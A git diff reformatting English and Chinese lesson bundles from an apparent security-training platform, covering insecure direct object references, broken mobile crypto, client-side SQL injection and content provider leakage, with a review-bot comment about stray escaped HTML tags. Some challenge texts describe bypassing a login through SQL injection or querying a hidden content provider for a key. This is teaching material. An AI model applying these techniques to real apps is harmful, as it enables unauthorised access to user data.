ID.\u5982\u679C\u8FD9\u4E2A\u9875\u9762\u662F\u5B58\u5728\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528\u6F0F\u6D1E,\u90A3\u4E48\u653B\u51FB\u8005\u5C06\u80FD\u591F\u4FEE\u6539\u7528\u6237\u6807\u8BC6\u7B26\u53C2\u6570\u53BB\u5F15\u7528\u5728\u8BE5\u7CFB\u7EDF\u4E2D\u7684\u4EFB\u4F55\u7528\u6237\u5BF9\u8C61.\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u901A\u8FC7\u5B83\u7684\u5B9E\u9645\u7F16\u53F7\u6216\u540D\u79F0\u5F15\u7528\u5BF9\u8C61.\u800C\u8FD9\u4E2A\u88AB\u76F4\u63A5\u5F15\u7528\u7684\u5BF9\u8C61\u5219\u88AB\u7528\u6765\u751F\u6210\u4E00\u4E2A\u7F51\u9875.\u5982\u679C\u5E94\u7528\u7A0B\u5E8F\u4E0D\u9A8C\u8BC1,\u8BE5\u7528\u6237\u88AB\u5141\u8BB8\u5F15\u7528\u8FD9\u4E2A\u5BF9\u8C61,\u5219\u8BE5\u5BF9\u8C61\u662F\u003C\u0061\u003E\u4E0D\u5B89\u5168\u5F15\u7528\u003C\u002F\u0041\u003E.
-paragraph.info2=\u653B\u51FB\u8005\u53EF\u4EE5\u5229\u7528\u4E0D\u5B89\u5168\u7684\u5BF9\u8C61\u5F15\u7528\u5C06\u7834\u574F\u4EFB\u610F\u53EF\u4EE5\u88AB\u76F8\u5E94\u7684\u53C2\u6570\u6240\u5F15\u7528\u7684\u4EFB\u4F55\u4FE1\u606F.\u5728\u4E0A\u9762\u7684\u4F8B\u5B50\u4E2D,\u653B\u51FB\u8005\u53EF\u4EE5\u8BBF\u95EE\u4EFB\u4F55\u7528\u6237\u7684\u4E2A\u4EBA\u4FE1\u606F.
-paragraph.info3=\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528\u7684\u4E25\u91CD\u7A0B\u5EA6\u53D6\u51B3\u4E8E\u88AB\u7834\u574F\u6570\u636E\u4EA7\u751F\u7684\u5F71\u54CD.\u8003\u8651\u8FD9\u6837\u4E00\u79CD\u60C5\u51B5\uFF0C\u4E00\u4E2A\u516C\u53F8\u80FD\u591F\u83B7\u53D6\u81EA\u5DF1\u7ADE\u4E89\u5BF9\u624B\u516C\u53F8\u7684\u4FE1\u606F.\u8FD9\u65F6,\u8BE5\u6F0F\u6D1E\u5BF9\u5546\u4E1A\u7684\u5F71\u54CD\u662F\u5DE8\u5927\u7684.\u8FD9\u4E9B\u6F0F\u6D1E\u662F\u5FC5\u987B\u8981\u4FEE\u590D,\u5E76\u4E14\u4E0D\u5E94\u8BE5\u51FA\u73B0\u5728\u4E13\u4E1A\u7EA7\u7684\u7A0B\u5E8F\u4E2D\u7684.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-sign.loading=\u8BF7\u7A0D\u4FAF
-sign.hint=\u9700\u8981\u63D0\u793A\u5417
-challenge.description=\u5B8C\u6210\u8BE5\u8BFE\u7684\u94A5\u5319\u88AB\u50A8\u5B58\u5728\u7BA1\u7406\u5458\u7684\u4E2A\u4EBA\u8D44\u6599\u4E2D.
-challenge.refresh=\u5237\u65B0\u4F60\u7684\u4E2A\u4EBA\u8D44\u6599
-challenge.userTitle=\u7528\u6237
-challenge.guest=\u6E38\u5BA2
-challenge.age=\u5E74\u9F84
-challenge.address=\u4F4F\u5740
-challenge.email=\u90AE\u7BB1
-challenge.message=\u4E2A\u4EBA\u4FE1\u606F
-challenge.noMessage=\u6CA1\u6709\u4E2A\u4EBA\u4FE1\u606F\u8BBE\u7F6E
-generic.error=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
+title.quesetion.insecure_direct_object_ref = \u4EC0\u4E48\u662F\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528?
+
+paragraph.info1 = \u60F3\u8C61\u4E00\u4E2A\u5141\u8BB8\u60A8\u67E5\u770B\u60A8\u7684\u4E2A\u4EBA\u4FE1\u606F\u7684\u7F51\u9875.\u8BE5\u7F51\u9875\u4E0A\u663E\u793A\u7528\u6237\u7684\u4FE1\u606F\u662F\u4EA7\u751F\u4E8E\u7528\u6237\u7684 ID.\u5982\u679C\u8FD9\u4E2A\u9875\u9762\u662F\u5B58\u5728\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528\u6F0F\u6D1E,\u90A3\u4E48\u653B\u51FB\u8005\u5C06\u80FD\u591F\u4FEE\u6539\u7528\u6237\u6807\u8BC6\u7B26\u53C2\u6570\u53BB\u5F15\u7528\u5728\u8BE5\u7CFB\u7EDF\u4E2D\u7684\u4EFB\u4F55\u7528\u6237\u5BF9\u8C61.\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u901A\u8FC7\u5B83\u7684\u5B9E\u9645\u7F16\u53F7\u6216\u540D\u79F0\u5F15\u7528\u5BF9\u8C61.\u800C\u8FD9\u4E2A\u88AB\u76F4\u63A5\u5F15\u7528\u7684\u5BF9\u8C61\u5219\u88AB\u7528\u6765\u751F\u6210\u4E00\u4E2A\u7F51\u9875.\u5982\u679C\u5E94\u7528\u7A0B\u5E8F\u4E0D\u9A8C\u8BC1,\u8BE5\u7528\u6237\u88AB\u5141\u8BB8\u5F15\u7528\u8FD9\u4E2A\u5BF9\u8C61,\u5219\u8BE5\u5BF9\u8C61\u662F\u003C\u0061\u003E\u4E0D\u5B89\u5168\u5F15\u7528\u003C\u002F\u0041\u003E.
+paragraph.info2 = \u653B\u51FB\u8005\u53EF\u4EE5\u5229\u7528\u4E0D\u5B89\u5168\u7684\u5BF9\u8C61\u5F15\u7528\u5C06\u7834\u574F\u4EFB\u610F\u53EF\u4EE5\u88AB\u76F8\u5E94\u7684\u53C2\u6570\u6240\u5F15\u7528\u7684\u4EFB\u4F55\u4FE1\u606F.\u5728\u4E0A\u9762\u7684\u4F8B\u5B50\u4E2D,\u653B\u51FB\u8005\u53EF\u4EE5\u8BBF\u95EE\u4EFB\u4F55\u7528\u6237\u7684\u4E2A\u4EBA\u4FE1\u606F.
+paragraph.info3 = \u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528\u7684\u4E25\u91CD\u7A0B\u5EA6\u53D6\u51B3\u4E8E\u88AB\u7834\u574F\u6570\u636E\u4EA7\u751F\u7684\u5F71\u54CD.\u8003\u8651\u8FD9\u6837\u4E00\u79CD\u60C5\u51B5\uFF0C\u4E00\u4E2A\u516C\u53F8\u80FD\u591F\u83B7\u53D6\u81EA\u5DF1\u7ADE\u4E89\u5BF9\u624B\u516C\u53F8\u7684\u4FE1\u606F.\u8FD9\u65F6,\u8BE5\u6F0F\u6D1E\u5BF9\u5546\u4E1A\u7684\u5F71\u54CD\u662F\u5DE8\u5927\u7684.\u8FD9\u4E9B\u6F0F\u6D1E\u662F\u5FC5\u987B\u8981\u4FEE\u590D,\u5E76\u4E14\u4E0D\u5E94\u8BE5\u51FA\u73B0\u5728\u4E13\u4E1A\u7EA7\u7684\u7A0B\u5E8F\u4E2D\u7684.
+
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+sign.loading = \u8BF7\u7A0D\u4FAF
+sign.hint = \u9700\u8981\u63D0\u793A\u5417
+
+challenge.description = \u5B8C\u6210\u8BE5\u8BFE\u7684\u94A5\u5319\u88AB\u50A8\u5B58\u5728\u7BA1\u7406\u5458\u7684\u4E2A\u4EBA\u8D44\u6599\u4E2D.
+challenge.refresh = \u5237\u65B0\u4F60\u7684\u4E2A\u4EBA\u8D44\u6599
+challenge.userTitle = \u7528\u6237
+challenge.guest = \u6E38\u5BA2
+challenge.age = \u5E74\u9F84
+challenge.address = \u4F4F\u5740
+challenge.email = \u90AE\u7BB1
+challenge.message = \u4E2A\u4EBA\u4FE1\u606F
+challenge.noMessage = \u6CA1\u6709\u4E2A\u4EBA\u4FE1\u606F\u8BBE\u7F6E
+
+generic.error = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
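Review bot: The re-added `paragraph.info1` value still carries escaped HTML at its end: `\u003C\u0061\u003E` opens an `<a>` and `\u003C\u002F\u0041\u003E` closes it as `</A>`, with no href, around the final phrase. The English bundle's `paragraph.info1` is plain text, so this looks like a leftover rather than intended markup. Since the commit rewrites every line of this file anyway, drop the two escape runs so the value ends `\u5219\u8BE5\u5BF9\u8C61\u662F\u4E0D\u5B89\u5168\u5F15\u7528.`. The page that renders this key is not visible here: if it HTML-encodes bundle values, users see literal tags, and if it does not, bundle text is being emitted as trusted markup, which is worth confirming for the other lesson bundles too.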
diff --git a/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212.properties b/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212.properties
index 7e97792bd..8392f4881 100644
--- a/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212.properties
+++ b/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212.properties
@@ -1,6 +1,9 @@
-title.question.mobile_broken_crypto=What is Mobile Broken Crypto?
-paragraph.info1=Cryptography is difficult to get right, as a result many Apps use cryptography poorly and become vulnerable to attack. An App can transfer encryption keys insecurely, use a known broken or deprecated cryptographic algorithm or developers can create their own Crypto algorithms.
-paragraph.info2=Poor key management can be due to hard coded keys, keys stored in directories, transferring the key in an insecure way or using the same key all the time. If the developers of an App make use a of custom, unproven, untested encryption algorithm then it is highly likely that the encrypted data is vulnerable.
-challenge.description=The developers of this App are holding a competition, whoever can crack their secure chat wins. Unfortunately, the developers have misunderstood the definition of Cryptography. Reduce the intercepted messages exchanged to plain text to reveal the key.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
\ No newline at end of file
+title.question.mobile_broken_crypto = What is Mobile Broken Crypto?
+
+paragraph.info1 = Cryptography is difficult to get right, as a result many Apps use cryptography poorly and become vulnerable to attack. An App can transfer encryption keys insecurely, use a known broken or deprecated cryptographic algorithm or developers can create their own Crypto algorithms.
+paragraph.info2 = Poor key management can be due to hard coded keys, keys stored in directories, transferring the key in an insecure way or using the same key all the time. If the developers of an App make use a of custom, unproven, untested encryption algorithm then it is highly likely that the encrypted data is vulnerable.
+
+challenge.description = The developers of this App are holding a competition, whoever can crack their secure chat wins. Unfortunately, the developers have misunderstood the definition of Cryptography. Reduce the intercepted messages exchanged to plain text to reveal the key.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212_zh.properties b/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212_zh.properties
index 33cd190f8..d84d740b9 100644
--- a/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212_zh.properties
+++ b/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212_zh.properties
@@ -1,6 +1,9 @@
-title.question.mobile_broken_crypto=\u4EC0\u4E48\u662F\u5931\u6548\u7684\u52A0\u5BC6?
-paragraph.info1=\u52A0\u5BC6\u6280\u672F\u662F\u5F88\u96BE\u6B63\u786E\u9009\u62E9\u7684,\u56E0\u6B64\u8BB8\u591A\u5E94\u7528\u7A0B\u5E8F\u4F7F\u7528\u4E0D\u4F73\u7684\u52A0\u5BC6\u6280\u672F,\u4ECE\u800C\u6210\u4E3A\u5BB9\u6613\u53D7\u5230\u653B\u51FB\u7684\u5BF9\u8C61.\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u53EF\u4EE5\u4E0D\u5B89\u5168\u5730\u4F20\u8F93\u52A0\u5BC6\u94A5\u5319,\u6BD4\u5982\u4F7F\u7528\u4E00\u4E2A\u5DF2\u77E5\u7684\u635F\u574F\u7684\u6216\u5DF2\u8FC7\u65F6\u7684\u52A0\u5BC6\u7B97\u6CD5\u6216\u5F00\u53D1\u4EBA\u5458\u521B\u5EFA\u4ED6\u4EEC\u81EA\u5DF1\u7684\u52A0\u5BC6\u7B97\u6CD5.
-paragraph.info2=\u4E0D\u5B8C\u5584\u7684\u5BC6\u5319\u7BA1\u7406\u53EF\u80FD\u662F\u7531\u4E8E\u786C\u7684\u7F16\u7801\u94A5\u5319,\u5B58\u50A8\u5728\u76EE\u5F55\u4E2D\u7684\u94A5\u5319,\u4EE5\u4E0D\u5B89\u5168\u7684\u65B9\u5F0F\u4F20\u9001\u5BC6\u94A5\u6216\u603B\u662F\u4F7F\u7528\u76F8\u540C\u7684\u5BC6\u94A5.\u5982\u679C\u4E00\u4E2A App \u7684\u5F00\u53D1\u4EBA\u5458\u4F7F\u7528\u81EA\u5B9A\u4E49\u7684, \u672A\u7ECF\u9A8C\u8BC1\u7684, \u672A\u6D4B\u8BD5\u7684\u52A0\u5BC6\u7B97\u6CD5\u5219\u5927\u5927\u52A0\u5927\u4E86\u52A0\u5BC6\u6570\u636E\u53EF\u653B\u51FB\u7684\u53EF\u80FD\u6027.
-challenge.description=\u8FD9\u4E2A\u7A0B\u5E8F\u7684\u5F00\u53D1\u4EBA\u5458\u5728\u4E3E\u884C\u4E00\u573A\u6BD4\u8D5B,\u65E0\u8BBA\u8C01\u53EF\u4EE5\u7834\u89E3\u4ED6\u4EEC\u7684\u5B89\u5168\u804A\u5929,\u8C01\u5C31\u80DC\u51FA. \u4F46\u95EE\u9898\u662F,\u5F00\u53D1\u4EBA\u5458\u8BEF\u89E3\u4E86\u52A0\u5BC6\u6280\u672F, \u4F60\u9700\u8981\u901A\u8FC7\u7B80\u5316\u88AB\u62E6\u622A\u7684\u4FE1\u606F\u5E76\u6362\u6210\u660E\u6587\u4FE1\u606F\u6765\u83B7\u53D6\u94A5\u5319.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
\ No newline at end of file
+title.question.mobile_broken_crypto = \u4EC0\u4E48\u662F\u5931\u6548\u7684\u52A0\u5BC6?
+
+paragraph.info1 = \u52A0\u5BC6\u6280\u672F\u662F\u5F88\u96BE\u6B63\u786E\u9009\u62E9\u7684,\u56E0\u6B64\u8BB8\u591A\u5E94\u7528\u7A0B\u5E8F\u4F7F\u7528\u4E0D\u4F73\u7684\u52A0\u5BC6\u6280\u672F,\u4ECE\u800C\u6210\u4E3A\u5BB9\u6613\u53D7\u5230\u653B\u51FB\u7684\u5BF9\u8C61.\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u53EF\u4EE5\u4E0D\u5B89\u5168\u5730\u4F20\u8F93\u52A0\u5BC6\u94A5\u5319,\u6BD4\u5982\u4F7F\u7528\u4E00\u4E2A\u5DF2\u77E5\u7684\u635F\u574F\u7684\u6216\u5DF2\u8FC7\u65F6\u7684\u52A0\u5BC6\u7B97\u6CD5\u6216\u5F00\u53D1\u4EBA\u5458\u521B\u5EFA\u4ED6\u4EEC\u81EA\u5DF1\u7684\u52A0\u5BC6\u7B97\u6CD5.
+paragraph.info2 = \u4E0D\u5B8C\u5584\u7684\u5BC6\u5319\u7BA1\u7406\u53EF\u80FD\u662F\u7531\u4E8E\u786C\u7684\u7F16\u7801\u94A5\u5319,\u5B58\u50A8\u5728\u76EE\u5F55\u4E2D\u7684\u94A5\u5319,\u4EE5\u4E0D\u5B89\u5168\u7684\u65B9\u5F0F\u4F20\u9001\u5BC6\u94A5\u6216\u603B\u662F\u4F7F\u7528\u76F8\u540C\u7684\u5BC6\u94A5.\u5982\u679C\u4E00\u4E2A App \u7684\u5F00\u53D1\u4EBA\u5458\u4F7F\u7528\u81EA\u5B9A\u4E49\u7684, \u672A\u7ECF\u9A8C\u8BC1\u7684, \u672A\u6D4B\u8BD5\u7684\u52A0\u5BC6\u7B97\u6CD5\u5219\u5927\u5927\u52A0\u5927\u4E86\u52A0\u5BC6\u6570\u636E\u53EF\u653B\u51FB\u7684\u53EF\u80FD\u6027.
+
+challenge.description = \u8FD9\u4E2A\u7A0B\u5E8F\u7684\u5F00\u53D1\u4EBA\u5458\u5728\u4E3E\u884C\u4E00\u573A\u6BD4\u8D5B,\u65E0\u8BBA\u8C01\u53EF\u4EE5\u7834\u89E3\u4ED6\u4EEC\u7684\u5B89\u5168\u804A\u5929,\u8C01\u5C31\u80DC\u51FA. \u4F46\u95EE\u9898\u662F,\u5F00\u53D1\u4EBA\u5458\u8BEF\u89E3\u4E86\u52A0\u5BC6\u6280\u672F, \u4F60\u9700\u8981\u901A\u8FC7\u7B80\u5316\u88AB\u62E6\u622A\u7684\u4FE1\u606F\u5E76\u6362\u6210\u660E\u6587\u4FE1\u606F\u6765\u83B7\u53D6\u94A5\u5319.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.properties b/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.properties
index b3b10fc7f..9ba939f0c 100644
--- a/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.properties
+++ b/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.properties
@@ -1,7 +1,10 @@
-title.question.csi=What is Mobile Client Side Injection?
-paragraph.info.1=Client Side Injection occurs when the user can execute SQLite commands through application input in order to change the query run by an App. The APK for this lesson encrypts it's databases using AES. It would be difficult to steal login details by attacking the encryption but a lot easier to use SQL Injection to bypass the login.
-paragraph.info.2=An ineffective defense against Client Side Injection is Filtering user input. This technique involves trying to predict the query which an attacker would execute and then replacing key words like SELECT, WHERE, FROM with a dot or blank space. Filtering will make it more difficult for an attacker to exploit an injection flaw but will not stop.
-paragraph.info.3=A security system is only as strongest as it's weakest link. We don't need to know the user credentials. We do know that the APK uses a textbook example of running an SQL query by appending the Username and Password to a String in a Select statement in order to verify if a Username and Password exist. If this statement returns true, the user is logged in.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-challenge.description=Exploit the SQL Injection flaw in this challenge's app to bypass the Client Side Login. Once you manage to log in as the admin, you will get the key.
\ No newline at end of file
+title.question.csi = What is Mobile Client Side Injection?
+
+paragraph.info.1 = Client Side Injection occurs when the user can execute SQLite commands through application input in order to change the query run by an App. The APK for this lesson encrypts it's databases using AES. It would be difficult to steal login details by attacking the encryption but a lot easier to use SQL Injection to bypass the login.
+paragraph.info.2 = An ineffective defense against Client Side Injection is Filtering user input. This technique involves trying to predict the query which an attacker would execute and then replacing key words like SELECT, WHERE, FROM with a dot or blank space. Filtering will make it more difficult for an attacker to exploit an injection flaw but will not stop.
+paragraph.info.3 = A security system is only as strongest as it's weakest link. We don't need to know the user credentials. We do know that the APK uses a textbook example of running an SQL query by appending the Username and Password to a String in a Select statement in order to verify if a Username and Password exist. If this statement returns true, the user is logged in.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+challenge.description = Exploit the SQL Injection flaw in this challenge's app to bypass the Client Side Login. Once you manage to log in as the admin, you will get the key.
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1_zh.properties b/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1_zh.properties
index 24db5a802..49a350be6 100644
--- a/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1_zh.properties
+++ b/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1_zh.properties
@@ -1,7 +1,10 @@
-title.question.csi=\u4EC0\u4E48\u662F\u79FB\u52A8\u5BA2\u6237\u7AEF\u6CE8\u5165?
-paragraph.info.1=\u5BA2\u6237\u7AEF\u767B\u5F55\u6CE8\u5165\u53D1\u751F\u5728\u5F53\u7528\u6237\u53EF\u4EE5\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u8F93\u5165\u53EF\u6267\u884C\u7684,\u53EF\u6539\u53D8\u4E00\u4E2A App \u8FD0\u884C\u67E5\u8BE2\u7684SQLite\u547D\u4EE4. \u8BE5\u8BFE\u7684 APK \u4F7F\u7528 AES \u52A0\u5BC6\u5B83\u7684\u6570\u636E\u5E93. \u8981\u901A\u8FC7\u653B\u51FB\u52A0\u5BC6\u7CFB\u7EDF\u53BB\u7A83\u53D6\u767B\u5F55\u4FE1\u606F\u4F1A\u76F8\u5F53\u56F0\u96BE,\u5982\u82E5\u4F7F\u7528 SQL \u6CE8\u5165\u6765\u7ED5\u8FC7\u767B\u5F55\u5C06\u4F1A\u66F4\u52A0\u7B80\u5355.
-paragraph.info.2=\u8FC7\u6EE4\u7528\u6237\u8F93\u5165\u88AB\u8BA4\u4E3A\u662F\u4E00\u79CD\u65E0\u6548\u7684\u9632\u5FA1\u5BA2\u6237\u7AEF\u6CE8\u5165\u65B9\u6CD5.\u7136\u540E\u66FF\u6362\u6389\u5173\u952E\u8BCD\u50CF SELECT, WHERE, FROM \u548C\u70B9\u6216\u7A7A\u683C. \u8FC7\u6EE4\u5C06\u53EA\u80FD\u4F7F\u653B\u51FB\u8005\u66F4\u96BE\u653B\u7834\u6CE8\u5165\u7F3A\u9677,\u4F46\u5374\u4E0D\u80FD\u963B\u6B62\u5165\u4FB5.
-paragraph.info.3=\u4E00\u4E2A\u5B89\u5168\u7CFB\u7EDF\u53EA\u662F\u53D6\u51B3\u4E8E\u5176\u6700\u8584\u5F31\u7684\u73AF\u8282. \u6B63\u5982\u8C1A\u8BED\u4E00\u73AF\u8F6F\u5F31,\u5168\u94FE\u4E0D\u5F3A.\u6211\u4EEC\u4E0D\u9700\u8981\u77E5\u9053\u7528\u6237\u7684\u51ED\u8BC1. \u6211\u4EEC\u53EA\u9700\u8981\u77E5\u9053 APK \u4F7F\u7528\u8FD0\u884C\u4E00\u6761 SQL \u67E5\u8BE2\u8BED\u53E5\u4F5C\u4E3A\u7ECF\u5178\u7684\u4F8B\u5B50\u6765\u9A8C\u8BC1\u4E00\u4E2A\u7528\u6237\u540D\u548C\u5BC6\u7801\u662F\u5426\u5B58\u5728, \u901A\u8FC7\u5728\u4E00\u6761 SELECT \u7533\u660E\u4E2D\u9644\u52A0\u7528\u6237\u540D\u548C\u5BC6\u7801\u5230\u4E00\u4E2A String. \u5982\u679C\u8BE5\u7533\u660E\u8FD4\u56DE true,\u5219\u8BE5\u7528\u6237\u5DF2\u767B\u5F55.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-challenge.description=\u5229\u7528 SQL \u6CE8\u5165\u5728\u8FD9\u4E2A\u6311\u6218\u7684\u5E94\u7528\u4E2D\u7ED5\u8FC7\u5BA2\u6237\u7AEF\u767B\u5F55.\u4E00\u65E6\u4F60\u4EE5\u4E00\u4E2A\u7BA1\u7406\u5458\u7684\u8EAB\u4EFD\u6210\u529F\u767B\u5F55,\u4F60\u4FBF\u53EF\u4EE5\u83B7\u53D6\u672C\u7AD9\u901A\u5173\u94A5\u5319.
\ No newline at end of file
+title.question.csi = \u4EC0\u4E48\u662F\u79FB\u52A8\u5BA2\u6237\u7AEF\u6CE8\u5165?
+
+paragraph.info.1 = \u5BA2\u6237\u7AEF\u767B\u5F55\u6CE8\u5165\u53D1\u751F\u5728\u5F53\u7528\u6237\u53EF\u4EE5\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u8F93\u5165\u53EF\u6267\u884C\u7684,\u53EF\u6539\u53D8\u4E00\u4E2A App \u8FD0\u884C\u67E5\u8BE2\u7684SQLite\u547D\u4EE4. \u8BE5\u8BFE\u7684 APK \u4F7F\u7528 AES \u52A0\u5BC6\u5B83\u7684\u6570\u636E\u5E93. \u8981\u901A\u8FC7\u653B\u51FB\u52A0\u5BC6\u7CFB\u7EDF\u53BB\u7A83\u53D6\u767B\u5F55\u4FE1\u606F\u4F1A\u76F8\u5F53\u56F0\u96BE,\u5982\u82E5\u4F7F\u7528 SQL \u6CE8\u5165\u6765\u7ED5\u8FC7\u767B\u5F55\u5C06\u4F1A\u66F4\u52A0\u7B80\u5355.
+paragraph.info.2 = \u8FC7\u6EE4\u7528\u6237\u8F93\u5165\u88AB\u8BA4\u4E3A\u662F\u4E00\u79CD\u65E0\u6548\u7684\u9632\u5FA1\u5BA2\u6237\u7AEF\u6CE8\u5165\u65B9\u6CD5.\u7136\u540E\u66FF\u6362\u6389\u5173\u952E\u8BCD\u50CF SELECT, WHERE, FROM \u548C\u70B9\u6216\u7A7A\u683C. \u8FC7\u6EE4\u5C06\u53EA\u80FD\u4F7F\u653B\u51FB\u8005\u66F4\u96BE\u653B\u7834\u6CE8\u5165\u7F3A\u9677,\u4F46\u5374\u4E0D\u80FD\u963B\u6B62\u5165\u4FB5.
+paragraph.info.3 = \u4E00\u4E2A\u5B89\u5168\u7CFB\u7EDF\u53EA\u662F\u53D6\u51B3\u4E8E\u5176\u6700\u8584\u5F31\u7684\u73AF\u8282. \u6B63\u5982\u8C1A\u8BED\u4E00\u73AF\u8F6F\u5F31,\u5168\u94FE\u4E0D\u5F3A.\u6211\u4EEC\u4E0D\u9700\u8981\u77E5\u9053\u7528\u6237\u7684\u51ED\u8BC1. \u6211\u4EEC\u53EA\u9700\u8981\u77E5\u9053 APK \u4F7F\u7528\u8FD0\u884C\u4E00\u6761 SQL \u67E5\u8BE2\u8BED\u53E5\u4F5C\u4E3A\u7ECF\u5178\u7684\u4F8B\u5B50\u6765\u9A8C\u8BC1\u4E00\u4E2A\u7528\u6237\u540D\u548C\u5BC6\u7801\u662F\u5426\u5B58\u5728, \u901A\u8FC7\u5728\u4E00\u6761 SELECT \u7533\u660E\u4E2D\u9644\u52A0\u7528\u6237\u540D\u548C\u5BC6\u7801\u5230\u4E00\u4E2A String. \u5982\u679C\u8BE5\u7533\u660E\u8FD4\u56DE true,\u5219\u8BE5\u7528\u6237\u5DF2\u767B\u5F55.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u5229\u7528 SQL \u6CE8\u5165\u5728\u8FD9\u4E2A\u6311\u6218\u7684\u5E94\u7528\u4E2D\u7ED5\u8FC7\u5BA2\u6237\u7AEF\u767B\u5F55.\u4E00\u65E6\u4F60\u4EE5\u4E00\u4E2A\u7BA1\u7406\u5458\u7684\u8EAB\u4EFD\u6210\u529F\u767B\u5F55,\u4F60\u4FBF\u53EF\u4EE5\u83B7\u53D6\u672C\u7AD9\u901A\u5173\u94A5\u5319.
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.properties b/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.properties
index c37b1edae..db9113e87 100644
--- a/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.properties
+++ b/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.properties
@@ -1,7 +1,10 @@
-title.question.content_provider_leak=What is Content Provider Leakage?
-paragraph.info.1=A Content Provider is used by Android to provide access to a structured set of data within a central repository. Content Providers are intended to be accessed by other applications, however with the Android Debug Bridge, they can be accessed by anyone with access to a device.
-paragraph.info.2=In order to query a Content Provider without an App, perform the following adb commands
-paragraph.info.3=Without knowing the URI, an attacker can do a few things to figure it out.
-challenge.description=The Key can be attained by querying the Content Provider. The URI is : content://com.somewhere.hidden.SecretProvider/data
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
\ No newline at end of file
+title.question.content_provider_leak = What is Content Provider Leakage?
+
+paragraph.info.1 = A Content Provider is used by Android to provide access to a structured set of data within a central repository. Content Providers are intended to be accessed by other applications, however with the Android Debug Bridge, they can be accessed by anyone with access to a device.
